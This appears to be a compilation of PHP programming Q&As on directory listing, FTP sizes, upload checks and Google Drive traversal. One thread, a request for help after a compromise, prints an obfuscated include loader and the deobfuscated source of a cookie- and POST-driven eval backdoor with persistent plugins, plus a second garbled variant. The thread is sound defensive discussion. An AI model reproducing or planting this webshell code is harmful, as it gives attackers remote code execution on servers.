I need to get a list of all the files on one server from another server.
I don't have access to the remote server's PHP config, such as its maximum timeout.
The maximum timeout could be very short, e.g. 30s. In some cases the following code gives a timeout error, because the iterator doesn't have enough time to get through all the files.
public function getStructure($path)
{
    $structure = new \stdClass();
    $structure->dirs = array();
    $structure->files = array();
    $iterator = new \RecursiveIteratorIterator(
        new \RecursiveDirectoryIterator($path), \RecursiveIteratorIterator::SELF_FIRST);
    foreach ($iterator as $file)
    {
        if ($file->isDir())
        {
            $structure->dirs[] = $file->getRealPath();
        }
        else
        {
            $structure->files[] = $file->getRealPath();
        }
    }
    return $structure;
}
I'm looking for a way to get the structure in multiple calls, something like myremotesite.com/api/v1/structure?start=xxxx, where start is the point where the last call stopped.
Thanks for your help
Sounds like you need a directory walker with save/resume functionality. I would probably implement it in SQLite, due to its synchronous-by-default nature.
Since I was bored: UNTESTED, but it should work in theory. Do NOT try to add beginTransaction()/commit() optimizations to this code; that would defeat the whole "synchronous and tolerates crashing at any moment" part of the code.
<?php
// Will return bool(true) when it's finished creating the database.
// Should be timeout/unstable-system resistant,
// relying on SQLite's synchronous-by-default nature.
function dirToSQLite($dir, $sqldb)
{
    if (!is_readable($dir)) {
        throw new InvalidArgumentException('argument 1 must be a readable dir, but is not readable.');
    }
    if (!is_dir($dir)) {
        throw new InvalidArgumentException('argument 1 is not a valid dir');
    }
    $db = new PDO('sqlite:' . $sqldb, '', '', array(
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    ));
    $db->exec('CREATE TABLE IF NOT EXISTS `dir` (`id` INTEGER PRIMARY KEY, `path` TEXT UNIQUE, `type` TEXT);');
    // Seed the work queue with the root dir; OR IGNORE makes re-runs resume instead of restart.
    $db->query('INSERT OR IGNORE INTO `dir` (`path`,`type`) VALUES(' . $db->quote($dir) . ',\'dirUnexplored\');');
    // OR IGNORE here too, so a run that crashed mid-directory can re-insert
    // the same paths harmlessly on resume instead of hitting the UNIQUE constraint.
    $stm = $db->prepare('INSERT OR IGNORE INTO `dir` (`path`,`type`) VALUES(:path,:type);');
    $stmExplored = $db->prepare('UPDATE `dir` SET `type` = \'dir\' WHERE id = ?');
    $path = '';
    $type = '';
    $stm->bindParam(':path', $path, PDO::PARAM_STR);
    $stm->bindParam(':type', $type, PDO::PARAM_STR);
    while (true) {
        $found = false;
        foreach ($db->query('SELECT `id`,`path` FROM `dir` WHERE `type` = \'dirUnexplored\'') as $res) {
            $found = true;
            $di = new DirectoryIterator($res['path']);
            foreach ($di as $file) {
                if ($file->isDot()) {
                    continue;
                } elseif ($file->isLink()) {
                    $type = 'link';
                } elseif ($file->isDir()) {
                    $type = 'dirUnexplored';
                } elseif ($file->isFile()) {
                    $type = 'file';
                } else {
                    $type = 'unknown';
                }
                $path = $file->getPathname();
                $stm->execute();
            }
            // Only mark the dir explored after all its entries are committed.
            $stmExplored->execute(array($res['id']));
        }
        if (!$found) {
            break;
        }
    }
    return true;
}

if (true === dirToSQLite('/home/foo', 'homefoo.db3')) {
    echo "finished!";
} else {
    throw new Exception();
}
Then just keep calling that URL until it returns the string "finished!"; after that you can download the SQLite database directly, with no PHP involved in the download.
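To make the polling idea concrete, here is a minimal, hypothetical endpoint sketch wrapping the function above; the file names and the 25-second budget are assumptions, not part of the original answer:
<?php
// scan.php - hypothetical polling endpoint (names are illustrative).
require 'dirToSQLite.php'; // assumed to contain dirToSQLite() from above

// Stay under the host's unknown timeout. If the script is killed anyway,
// the next request simply resumes from the SQLite work queue.
set_time_limit(25);

if (true === dirToSQLite('/home/foo', __DIR__ . '/homefoo.db3')) {
    echo "finished!"; // the client stops polling and downloads homefoo.db3
}
The client just keeps re-requesting scan.php until the response body is "finished!".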
Related
I have a number of different hosting accounts set up for clients and need to calculate the amount of storage space being used on each account, updated regularly.
I have a database set up to record each client's storage usage.
I attempted this first using a PHP file on each account, run by a cron job. If run manually by myself, it would output the correct file size and update the correct size to the database, but when run from the cron job, it would output 0.
I then attempted to run this file via a cron job from the main account, but figured this wouldn't actually work, as my hosting would block requests from another server and I would end up with the same result as before.
I am now playing around with FTP access to each account from a cron job on the main account, which looks something like the code below. The only problem is that I don't know how to calculate directory sizes rather than single file sizes using FTP access, and I don't know how to recurse this way. Hoping somebody might be able to help here before I end up going around in circles.
I will also add my previous attempt below.
$ftp_conn = ftp_connect($ftp_host, 21, 420) or die("Could not connect to server");
$ftp_login = ftp_login($ftp_conn, $ftp_username, 'mypassword');

$total_size = 0;
$contents = ftp_nlist($ftp_conn, ".");

// output $contents
foreach ($contents as $folder) {
    while ($search == true) {
        if ($folder == '..' || $folder == '.') {
        } else {
            $file = $folder;
            $res = ftp_size($ftp_conn, $file);
            if ($res != -1) {
                $total_size = $total_size + $res;
            } else {
                $total_size = $total_size;
            }
        }
    }
}

ftp_close($ftp_conn);
This doesn't work, as it doesn't calculate folder sizes, and I don't know how to recurse using this method.
This second script did work, but only when opened manually; it returned 0 if run by the cron job.
class Directory_Calculator {

    function calculate_whole_directory($directory)
    {
        if ($handle = opendir($directory))
        {
            $size = 0;
            $folders = 0;
            $files = 0;
            while (false !== ($file = readdir($handle)))
            {
                if ($file != "." && $file != "..")
                {
                    if (is_dir($directory.$file))
                    {
                        $array = $this->calculate_whole_directory($directory.$file.'/');
                        $size += $array['size'];
                        $files += $array['files'];
                        $folders += $array['folders'];
                    }
                    else
                    {
                        $size += filesize($directory.$file);
                        $files++;
                    }
                }
            }
            closedir($handle);
        }
        $folders++;
        return array('size' => $size, 'files' => $files, 'folders' => $folders);
    }

}

/* Path to Directory - IMPORTANT: with '/' at the end */
$directory = '../public_html/';

// return an array with: size, total files & folders
$directory_size = new Directory_Calculator;
$array = $directory_size->calculate_whole_directory($directory);
$size_of_site = $array['size'];
echo $size_of_site;
Please bear in mind that I am currently testing, and none of the MySQLi or PHP scripts are secure yet.
If your server supports the MLSD command and you have PHP 7.2 or newer, you can use the ftp_mlsd function:
function calculate_whole_directory($ftp_conn, $directory)
{
    $files = ftp_mlsd($ftp_conn, $directory) or die("Cannot list $directory");

    $result = 0;
    foreach ($files as $file)
    {
        if (($file["type"] == "cdir") || ($file["type"] == "pdir"))
        {
            $size = 0;
        }
        else if ($file["type"] == "dir")
        {
            $size = calculate_whole_directory($ftp_conn, $directory."/".$file["name"]);
        }
        else
        {
            $size = intval($file["size"]);
        }
        $result += $size;
    }
    return $result;
}
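For completeness, a small sketch of how this function might be wired up from the cron script; the host, credentials, and path are placeholders, not values from the question:
// Hypothetical wiring; substitute real credentials and a real path.
$ftp_conn = ftp_connect("ftp.example.com") or die("Could not connect to server");
ftp_login($ftp_conn, "username", "password") or die("Could not log in");

$total_size = calculate_whole_directory($ftp_conn, "/public_html");
echo $total_size; // size in bytes, ready to be written to the usage database

ftp_close($ftp_conn);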
If you do not have PHP 7.2, you can try to implement the MLSD command on your own. For a start, see this user comment on the ftp_rawlist documentation:
https://www.php.net/manual/en/function.ftp-rawlist.php#101071
If you cannot use MLSD, your particular problem will be telling whether an entry is a file or a folder. While you can use the ftp_size trick, as you do, calling ftp_size for each entry can take ages.
But if you need to work against one specific FTP server only, you can use ftp_rawlist to retrieve a file listing in a platform-specific format and parse that.
The following code assumes a common *nix format.
function calculate_whole_directory($ftp_conn, $directory)
{
    $lines = ftp_rawlist($ftp_conn, $directory) or die("Cannot list $directory");

    $result = 0;
    foreach ($lines as $line)
    {
        $tokens = preg_split("/\s+/", $line, 9);
        $name = $tokens[8];

        if ($tokens[0][0] === 'd')
        {
            $size = calculate_whole_directory($ftp_conn, "$directory/$name");
        }
        else
        {
            $size = intval($tokens[4]);
        }
        $result += $size;
    }
    return $result;
}
Based on PHP FTP recursive directory listing.
Regarding cron: I'd guess that cron does not start your script with the correct working directory, so you end up calculating the size of a non-existent directory.
Use an absolute path here:
$directory = '../public_html/';
Though you'd better add some error checking so that you can see for yourself what goes wrong.
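For instance, a minimal sketch of that error checking; the absolute path below is a made-up example, not the asker's real path:
// Use an absolute path so the script works regardless of cron's working directory.
$directory = '/home/youraccount/public_html/';   // illustrative path

if (!is_dir($directory)) {
    die("Directory $directory does not exist - check cron's working directory");
}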
What I want to do is a small web page where a user can upload an SQLite file, but I want to reject uploads that aren't in SQLite format, so I try to verify the file before I call move_uploaded_file. Below is an example of what I've tried to do, but it doesn't work.
function isFileOkay($filedir) {
    try
    {
        $db = new PDO("sqlite:".$filedir);
        $sql = "PRAGMA schema_version;";
        $ret = $db->query($sql);
        if (!$ret)
        {
            $db = NULL;
            return -1;
        }
        $row = $ret->fetchAll(PDO::FETCH_BOTH);
        $value = (int) $row[0]['schema_version'];
        $db = NULL;
        return $value;
    }
    catch (PDOException $exception) {
        echo $exception->getMessage();
        return -1;
    }
}
...
$test = isFileOkay($_FILES['upload_file']['tmp_name']);
...
The $test variable should be -1 if the file isn't an SQLite file, or $value otherwise. $value = 0 also indicates that the file is not okay, but any value greater than 0 indicates a valid SQLite file.
The point is that when I test this code by manually inserting a path for $filedir, e.g. a file already existing on this machine, the output is correct. But when I try to verify $_FILES['upload_file']['tmp_name'], it doesn't work and the page crashes.
I am new at web programming, especially in PHP, so I think there might be a misunderstanding about the $_FILES variable.
You should be able to check the mime type of the uploaded file:
$finfo = new finfo(FILEINFO_MIME_TYPE);
$mime = $finfo->file($_FILES['upload_file']['tmp_name']);

// SQLite is application/x-sqlite3
if ($mime == 'application/x-sqlite3') {
    // Is SQLite
} else {
    // Is something else
}
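As an alternative that does not depend on the libmagic database (whose reported mime type can vary between versions), every SQLite 3 database begins with the 16-byte header string "SQLite format 3" followed by a NUL byte, so you can check it directly. A minimal sketch; hasSqliteHeader is a made-up helper name:
// Check the SQLite 3 magic header directly (first 16 bytes of the file).
function hasSqliteHeader($path) {
    $fh = fopen($path, 'rb');
    if ($fh === false) {
        return false;
    }
    $header = fread($fh, 16);
    fclose($fh);
    return $header === "SQLite format 3\x00";
}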
I have three websites, all hosted on the same web server. Recently I was working on one of the websites and noticed that, about a month ago, a bunch of files had been changed. Specifically, all instances of index.html had been renamed to index.html.bak.bak, and index.php files had been put in their places. The index.php files are relatively simple; they include a file hidden somewhere in each website's filesystem (seemingly a random folder) that's been obfuscated with hex encoding, then echo the original index.html:
<?php
/*2d4f2*/
@include "\x2fm\x6et\x2fs\x74o\x721\x2dw\x631\x2dd\x66w\x31/\x338\x304\x323\x2f4\x365\x380\x39/\x77w\x77.\x77e\x62s\x69t\x65.\x63o\x6d/\x77e\x62/\x63o\x6et\x65n\x74/\x77p\x2di\x6ec\x6cu\x64e\x73/\x6as\x2fs\x77f\x75p\x6co\x61d\x2ff\x61v\x69c\x6fn\x5f2\x391\x337\x32.\x69c\x6f";
/*2d4f2*/
echo file_get_contents('index.html.bak.bak');
The included file here was
/mnt/*snip*/www.website.com/web/content/wp-includes/js/swfupload/favicon_291372.ico
On another domain, it was
/mnt/*snip*/www.website2.com/web/content/wiki/maintenance/hiphop/favicon_249bed.ico
As you could probably guess, these aren't actually favicons - they're just php files with a different extension. Now, I have no clue what these files do (which is why I'm asking here). They were totally obfuscated, but https://malwaredecoder.com/ seems to be able to crack through it. The results can be found here, but I've pasted the de-obfuscated code below:
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@error_reporting(0);
@set_time_limit(0);
if(!defined("PHP_EOL"))
{
define("PHP_EOL", "\n");
}
if(!defined("DIRECTORY_SEPARATOR"))
{
define("DIRECTORY_SEPARATOR", "/");
}
if (!defined('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18'))
{
define('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18', 1);
$data = NULL;
$data_key = NULL;
$GLOBALS['cs_auth'] = '8debdf89-dfb8-4968-8667-04713f279109';
global $cs_auth;
if (!function_exists('file_put_contents'))
{
function file_put_contents($n, $d, $flag = False)
{
$mode = $flag == 8 ? 'a' : 'w';
$f = @fopen($n, $mode);
if ($f === False)
{
return 0;
}
else
{
if (is_array($d)) $d = implode($d);
$bytes_written = fwrite($f, $d);
fclose($f);
return $bytes_written;
}
}
}
if (!function_exists('file_get_contents'))
{
function file_get_contents($filename)
{
$fhandle = fopen($filename, "r");
$fcontents = fread($fhandle, filesize($filename));
fclose($fhandle);
return $fcontents;
}
}
function cs_get_current_filepath()
{
return trim(preg_replace("/\(.*\$/", '', __FILE__));
}
function cs_decrypt_phase($data, $key)
{
$out_data = "";
for ($i=0; $i<strlen($data);)
{
for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
{
$out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
}
}
return $out_data;
}
function cs_decrypt($data, $key)
{
global $cs_auth;
return cs_decrypt_phase(cs_decrypt_phase($data, $key), $cs_auth);
}
function cs_encrypt($data, $key)
{
global $cs_auth;
return cs_decrypt_phase(cs_decrypt_phase($data, $cs_auth), $key);
}
function cs_get_plugin_config()
{
$self_content = @file_get_contents(cs_get_current_filepath());
$config_pos = strpos($self_content, md5(cs_get_current_filepath()));
if ($config_pos !== FALSE)
{
$config = substr($self_content, $config_pos + 32);
$plugins = @unserialize(cs_decrypt(base64_decode($config), md5(cs_get_current_filepath())));
}
else
{
$plugins = Array();
}
return $plugins;
}
function cs_set_plugin_config($plugins)
{
$config_enc = base64_encode(cs_encrypt(@serialize($plugins), md5(cs_get_current_filepath())));
$self_content = @file_get_contents(cs_get_current_filepath());
$config_pos = strpos($self_content, md5(cs_get_current_filepath()));
if ($config_pos !== FALSE)
{
$config_old = substr($self_content, $config_pos + 32);
$self_content = str_replace($config_old, $config_enc, $self_content);
}
else
{
$self_content = $self_content . "\n\n//" . md5(cs_get_current_filepath()) . $config_enc;
}
@file_put_contents(cs_get_current_filepath(), $self_content);
}
function cs_plugin_add($name, $base64_data)
{
$plugins = cs_get_plugin_config();
$plugins[$name] = base64_decode($base64_data);
cs_set_plugin_config($plugins);
}
function cs_plugin_rem($name)
{
$plugins = cs_get_plugin_config();
unset($plugins[$name]);
cs_set_plugin_config($plugins);
}
function cs_plugin_load($name=NULL)
{
foreach (cs_get_plugin_config() as $pname=>$pcontent)
{
if ($name)
{
if (strcmp($name, $pname) == 0)
{
eval($pcontent);
break;
}
}
else
{
eval($pcontent);
}
}
}
foreach ($_COOKIE as $key=>$value)
{
$data = $value;
$data_key = $key;
}
if (!$data)
{
foreach ($_POST as $key=>$value)
{
$data = $value;
$data_key = $key;
}
}
$data = @unserialize(cs_decrypt(base64_decode($data), $data_key));
if (isset($data['ak']) && $cs_auth==$data['ak'])
{
if ($data['a'] == 'i')
{
$i = Array(
'pv' => @phpversion(),
'sv' => '2.0-1',
'ak' => $data['ak'],
);
echo @serialize($i);
exit;
}
elseif ($data['a'] == 'e')
{
eval($data['d']);
}
elseif ($data['a'] == 'plugin')
{
if($data['sa'] == 'add')
{
cs_plugin_add($data['p'], $data['d']);
}
elseif($data['sa'] == 'rem')
{
cs_plugin_rem($data['p']);
}
}
echo $data['ak'];
}
cs_plugin_load();
}
In addition, there is a file called init5.php in one of the websites' content folders, which, after deobfuscating as much as possible, becomes:
$GLOBALS['893\Gt3$3'] = $_POST;
$GLOBALS['S9]<\<\$'] = $_COOKIE;
#>P>r"$,('$66N6rTNj', NULL);
#>P>r"$,('TNjr$66N6"', 0);
#>P>r"$,('k3'r$'$9#,>NPr,>k$', 0);
#"$,r,>k$rT>k>,(0);
$w6f96424 = NULL;
$s02c4f38 = NULL;
global $y10a790;
function a31f0($w6f96424, $afb8d)
{
$p98c0e = "";
for ($r035e7=0; $r035e7<",6T$P($w6f96424);)
{
for ($l545=0; $l545<",6T$P($afb8d) && $r035e7<",6T$P($w6f96424); $l545++, $r035e7++)
{
$p98c0e .= 9)6(N6`($w6f96424[$r035e7]) ^ N6`($afb8d[$l545]));
}
}
return $p98c0e;
}
function la30956($w6f96424, $afb8d)
{
global $y10a790;
return 3\x9<(3\x9<($w6f96424, $y10a790), $afb8d);
}
foreach ($GLOBALS['S9]<\<\$'] as $afb8d=>$ua56c9d)
{
$w6f96424 = $ua56c9d;
$s02c4f38 = $afb8d;
}
if (!$w6f96424)
{
foreach ($GLOBALS['893\Gt3$3'] as $afb8d=>$ua56c9d)
{
$w6f96424 = $ua56c9d;
$s02c4f38 = $afb8d;
}
}
$w6f96424 = ##P"$6>3T>a$(T3\<]tO(R3"$OIr`$9N`$($w6f96424), $s02c4f38));
if (isset($w6f96424['38']) && $y10a790==$w6f96424['38'])
{
if ($w6f96424['3'] == '>')
{
$r035e7 = Array(
'#=' => ##)#=$6">NP(),
'"=' => 'x%<Fx',
);
echo #"$6>3T>a$($r035e7);
}
elseif ($w6f96424['3'] == '$')
{
eval($w6f96424['`']);
}
}
There are more obfuscated PHP files the more I look, which is kinda scary. There are tons of them. Even WordPress' own index.php files seem to have been infected; the obfuscated @includes have been added to them. In addition, on one of the websites, there's a file titled 'ssh' that seems to be some kind of binary file (maybe the 'ssh' program itself?).
Does anyone know what these files are or do? How did they get onto my server? How can I get rid of them and make sure they never come back?
Some other info: my webhost is Laughing Squid; I have no shell access. The server runs Linux, Apache 2.4, and PHP 5.6.29. Thank you!
You can't trust anything on the server at this point.
Reinstall the OS
Reinstall known good copies of your code with a clean or known-good version of the database.
At this point there's no use in just replacing/deleting "bad" files, because the attacker could have done absolutely anything, ranging from "nothing" to replacing system-level software with hacked versions that will do anything desired. Just as an example, at one point someone wrote malware into a compiler, so even if an executable was rebuilt, the malware was still there; it also prevented the debugger from detecting it.
There are various cleaners available, but they rely on knowing/detecting/undoing everything the attacker might have done, which is impossible.
If you had good daily backups, you could do a diff between what you have and what you had before and see what has changed; however, you would still need to carefully examine or restore your database, since many attacks involve changing data, not code.
This is not a hack you need to trash your sites and server over. It is just a PHP hack. Get rid of all of the malicious PHP files and code and you'll be good. Here is how I did it on Drupal: http://rankinstudio.com/Drupal_ico_index_hack
I had this same malware. There are 10 to 15 files the malware adds or modifies. I used the Quttera WordPress plugin (free) to find the files. Most of the files can just be deleted (be careful: Quttera flags more files than are actually infected), but some WordPress files were modified and must be replaced.
I had to write one PHP script to scan the whole server tree, listing all directory paths, and another to scan those paths for infections. It can only partly clean, but it provides much-needed help with the pedestrian cleanup.
NOTE:
It's poorly written, and probably should be removed after use. But it helped me.
A zipped copy is here.
No guarantees; unzip it and take a look at what you are putting on your server before uploading it!
Update: Now cleans more (not all!). Follow up with hand-cleaning (see below).
I had the same problem.
It is caused by malicious HTTP POST requests.
Here is a good article about how to stop it: https://perishablepress.com/protect-post-requests/
The following in a .htaccess file will stop all POST requests:
# deny all POST requests
<IfModule mod_rewrite.c>
    RewriteCond %{REQUEST_METHOD} POST
    RewriteRule .* - [F,L]
</IfModule>
I haven't yet found out how to prevent these files from appearing on my server, but I am able to get rid of them. Here's a one-liner that crawls down the folders and removes them:
find . -type f -name 'favicon_*.ico' -delete -print
Below is the code that throws some errors while being executed. What I'm trying to do is make the last line of the code get executed no matter what (error or no error).
<?php
require 'main.php';

function create_photo($file_path) {
    # Upload the received image file to Cloudinary
    $result = \Cloudinary\Uploader::upload($file_path, array(
        "tags" => "backend_photo_album",
    ));
    unlink($file_path);
    error_log("Upload result: " . \PhotoAlbum\ret_var_dump($result));
    $photo = \PhotoAlbum\create_photo_model($result);
    return $result;
}

$files = $_FILES["files"];
$files = is_array($files) ? $files : array($files);
$files_data = array();

foreach ($files["tmp_name"] as $index => $value) {
    array_push($files_data, create_photo($value));
}
?>
<script>window.location.replace('index.html')</script>
Any help would be much appreciated. Thanks
I think that, depending on your PHP version (finally requires PHP 5.5 or later), you can use a try/catch/finally block like this:
try
{
    // code that may throw an exception
}
catch (Exception $e) // the exception type you want to catch
{
    // exception treatment
}
finally
{
    // executed no matter what
}
Maybe take a look at how to use that.
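Applied to the question's code, a minimal sketch could look like the following; this assumes the redirect is the part that must always run, and keeps the question's helper functions:
$files_data = array();
try {
    foreach ($files["tmp_name"] as $index => $value) {
        array_push($files_data, create_photo($value));
    }
} catch (Exception $e) {
    // exception treatment; log and fall through to finally
    error_log("Upload failed: " . $e->getMessage());
} finally {
    // executed no matter what: always send the client back to index.html
    echo "<script>window.location.replace('index.html')</script>";
}
Note that in PHP 5 this only catches thrown exceptions; fatal errors still abort the script (PHP 7 makes many of them catchable as Throwable).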
How can I get basic info (id, title, mime type at least) for each file and folder in the subtree of a given folder with as few API calls as possible, i.e. without calling the API to fetch details for every subfolder?
I found a workaround: read all files matching some non-hierarchical characteristic (e.g. owner) and build the tree structure in the client script. Unfortunately my files are all from one owner (the application), so I cannot do it this way.
OK, here is the example code for the recursive multiple-API-calls way, which can be enough for some use cases. But I would like to find a better concept (not to discuss this implementation, but another way that does not call the API for each folder):
class Foo {

    const FOLDER_MIME_TYPE = 'application/vnd.google-apps.folder';

    public function getSubtreeForFolder($parentId, $sort = true)
    {
        $service = $this->createCrmGService();

        // A. folder info
        $file = $service->files->get($parentId);
        $ret = array(
            'id'          => $parentId,
            'name'        => $file->getTitle(),
            'description' => $file->getDescription(),
            'mimetype'    => $file->getMimeType(),
            'is_folder'   => true,
            'children'    => array(),
            'node'        => $file,
        );
        if ($ret['mimetype'] != self::FOLDER_MIME_TYPE) {
            throw new Exception(_t("{$ret['name']} is not a folder."));
        }

        // 'nextPageToken' must be requested in the fields filter, otherwise
        // pagination stops after the first page; 'downloadUrl' is used below.
        $items = $this->findAllFiles('trashed = false', $parentId,
            'nextPageToken,items(alternateLink,description,downloadUrl,fileSize,id,mimeType,title)', $service);

        foreach ($items as $child)
        {
            if ($this->isFolder($child))
            {
                $ret['children'][] = $this->getSubtreeForFolder($child->id, $sort);
            }
            else
            {
                // B. file info
                $a['id'] = $child->id;
                $a['name'] = $child->title;
                $a['description'] = $child->description;
                $a['is_folder'] = false;
                $a['url'] = $child->getDownloadUrl();
                $a['url_detail'] = $child->getAlternateLink();
                $a['versionLabel'] = false; //FIXME
                $a['node'] = $child;
                if (!$a['versionLabel']) {
                    $a['versionLabel'] = '1.0'; //old files compatibility hack
                }
                $ret['children'][] = $a;
            }
        }

        if ($sort && isset($ret['children']))
        {
            if ($sort === true) {
                // strcasecmp already returns 0 for equal names
                $sort = function ($a, $b) {
                    return strcasecmp($a['name'], $b['name']);
                };
            }
            usort($ret['children'], $sort);
        }
        return $ret;
    }
    public function findAllFiles($queryString, $parentId = false, $fieldsFilter = 'nextPageToken,items(id,title)', $service = false)
    {
        if (!$service) $service = $this->createCrmGService();
        $result = array();
        $pageToken = NULL;

        if ($parentId) {
            $queryString .= ($queryString ? ' AND ' : '') . "'{$parentId}' in parents";
        }

        do {
            try {
                $parameters = array('q' => $queryString);
                if ($fieldsFilter) $parameters['fields'] = $fieldsFilter;
                if ($pageToken) {
                    $parameters['pageToken'] = $pageToken;
                }
                $files = $service->files->listFiles($parameters);

                $result = array_merge($result, $files->getItems());
                $pageToken = $files->getNextPageToken();
            } catch (Exception $e) {
                print "An error occurred: " . $e->getMessage();
                $pageToken = NULL;
            }
        } while ($pageToken);

        return $result;
    }
    /**
     * @param Google_DriveFile $file
     * @return boolean whether $file is a folder.
     */
    protected function isFolder($file)
    {
        return $file->getMimeType() == self::FOLDER_MIME_TYPE;
    }
}
First, I would suggest that you not fetch all files and folders. It takes too much time for users who have many files on their Drive, and there is a query limit on your application key. In fact, many applications with a custom file picker query the API each time the user requests a subfolder.
Second, if this is a web app, it would be a better idea to use Google Picker. Google Picker is much faster and more efficient for picking files from Drive. There are many options and filters, and you get decent control over files.
Third, you cannot fully represent Drive's files and folders as a tree structure. As you can see in the queries, each file has a parents property, which means there can be more than one parent per file/folder. You need to think of some workaround, like choosing only one of the parents for each file.
If you still want to get all file/folder information, in terms of performance the best implementation would be recursively calling Children.list(), as sketched below. FYI, the file id 'root' is a reserved id you can easily start with. And once you have the ids of the children, you can make a batch query of Files.get() with multipart. This is the fastest way to traverse the file system of Google Drive, afaik.
Again, unless you have a very good reason, please do not try to traverse all files in Drive at once. Some users have a lot of files in their Drive, and you will make them wait forever no matter how good your optimization is. Also, you will easily hit the query limit.
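To illustrate the Children.list() approach, here is a rough sketch against the Drive v2 PHP client that the question's code appears to use. Treat it as an assumption-laden outline (the method names follow the old Google_Service_Drive v2 client, and batching details vary by client version), not a tested implementation:
// Sketch: breadth-first traversal using Children.list (Drive v2 API).
// Children.list returns only child ids, so details (title, mimeType, ...)
// are fetched afterwards with Files.get, ideally as a batch request.
function listChildIds($service, $folderId)
{
    $ids = array();
    $pageToken = NULL;
    do {
        $parameters = array();
        if ($pageToken) {
            $parameters['pageToken'] = $pageToken;
        }
        $children = $service->children->listChildren($folderId, $parameters);
        foreach ($children->getItems() as $child) {
            $ids[] = $child->getId();
        }
        $pageToken = $children->getNextPageToken();
    } while ($pageToken);
    return $ids;
}

$queue = array('root'); // 'root' is the reserved id of the Drive root folder
while ($queue) {
    $folderId = array_shift($queue);
    foreach (listChildIds($service, $folderId) as $childId) {
        // Fetch details here, preferably batching the Files.get() calls,
        // and push ids of sub-folders back onto $queue.
    }
}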